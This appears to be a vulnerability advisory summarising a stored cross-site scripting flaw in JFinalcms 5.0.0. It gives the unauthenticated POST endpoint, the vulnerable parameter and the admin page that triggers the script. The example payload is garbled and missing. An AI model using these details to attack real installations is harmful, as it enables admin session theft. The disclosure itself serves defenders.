CVE-2024-22493

A stored cross-site scripting (XSS) vulnerability exists in JFinalcms 5.0.0 via the /guestbook/save endpoint, specifically in the content parameter. The input is not properly sanitized or encoded, allowing attackers to store arbitrary web scripts that will be executed later [1][2].

Exploitation does not require authentication; an attacker sends a POST request to /guestbook/save with a crafted content parameter, such as `. The payload is stored in the database and triggered when an administrator visits /admin/guestbook` to view the guestbook entries [2].

When an admin accesses the affected page, the injected script executes in their browser, enabling theft of session cookies, defacement, or other actions within the admin context. The impact is high, as an attacker can compromise the admin session and potentially gain full control [1][2].

As of publication, no official patch has been released. Users should implement input sanitization and encoding for the content field, or restrict access to the guestbook functionality. The vulnerability is publicly documented with a proof-of-concept (PoC) available [2].